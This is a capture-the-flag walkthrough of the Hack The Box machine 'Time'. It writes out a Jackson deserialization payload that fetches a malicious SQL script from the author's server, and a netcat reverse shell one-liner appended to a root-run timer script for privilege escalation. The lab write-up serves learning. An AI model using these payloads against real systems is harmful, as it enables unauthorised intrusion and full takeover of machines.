Sign in

Time — Hack The Box

Hi folks, I am Tushar De. Today I am going to share another walkthrough of a medium rated linux box from HTB, named Time, created by egotisticalSW and felamos. So, without any further introduction, let’s jump in.

Network Scanning

nmap scan

A basic nmap TCP scan gave two ports:

22: OpenSSH 8.2p1

80: Apache 2.4.41 server

rustscan result

I ran a full TCP port scan using rustscan, because “It saves a lot of Time”. But no new ports came out. I also ran a UDP port scan against the target, but it was also void. So, before going to further enumeration, let me make a mental note:

The service against SSH port doesn’t have any popular exploit. So, the webserver enumeration was definitely my next step.

Enumeration

The HTTP service aka website gave a feature of online Json beautifier and validator.

Web Page

When I put ‘test’ in the input field of Beautify function , it returned with a messege “null”.

Response in Beautify

Then I checked the another dropdown menu, termed “Validate(beta!)” and put something in the input field. It returned an interesting thing:

Response in Validate(beta!)

I received an error related to com.fasterxml.jackson.core. As I had no idea about this, I researched on that and found something in github.

The Repository: Here

So, I cloned the repo in my local machine and found a way to get reverse shell.

Content of inject.sql

Exploitation

To get a reverse shell, I borrowed a simple bash one liner script from pentestmonkey and edited the script with my hackthebox openvpn ip and a random port and included this in the “SHELLEXEC” function in the inject.sql file.

Next I started a python3 one-liner http server in my local machine to transfer the inject.sql file from our machine to the victim machine.

python3 http server

Now in the “Validate(beta!)” function, I included the following payload, which was given in the git repo:

Payload
["ch.qos.logback.core.db.DriverManagerConnectionSource", {"url":"jdbc:h2:mem:;TRACE_LEVEL_SYSTEM_OUT=3;INIT=RUNSCRIPT FROM 'http://10.10.16.171:8000/inject.sql'"}]

Here in the payload, I modified the path from which the server takes my malicious file inject.sql. That was my local http server.

Now after including the payload and clicked on “Process”, the server took the file from my machine:

And I got a shell as ‘pericles’!

[Make sure to set a netcat listenter in the port, you choose]

The reverse shell was good, but not best. So, I choosed a python3 pty module to get a better shell of full functionality:

The user flag is in home directory of pericles

Privilege Escalation

I uploaded Linux Enumeration script (LinEnum.sh) from github to the /tmp directory of victim machine and ran it after executable permission:

Within some time, it showed some interesting thing:

System Timers

The timer was run 8 seconds ago and was going to run again in 1 sec. This was weird, because in hack the box machines, it is quite abnormal. So, it was better to look at in detail.

Generally the timer service is at/etc/systemd in Linux System:

content of /etc/systemd/system/timer_backup.service

The content of the file was simple. The Wantsand WantedBy describes the relation of this timer_backup service to others at starting. The ExecStart tells what it executes. Basically it restarts another service web_backup.service .

Content of web_backup.service

It is running a shell script, /usr/bin/timer_backup.sh , which was a writable file:

I added a netcat reverse shell one-liner at the end of the script:

echo "rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.16.171 4444 >/tmp/f" >> /usr/bin/timer_backup.sh and set up a netcat listener on port 4444.

Since the script is executed by root every 5–10 seconds so next time it executed, I got a root shell which died very quickly. So, I had to be quick. For that, I prepared to merge some commands together and executed them simultaneously.

And Time was rooted successfully.

Thanks for reading.

Cyber Security Student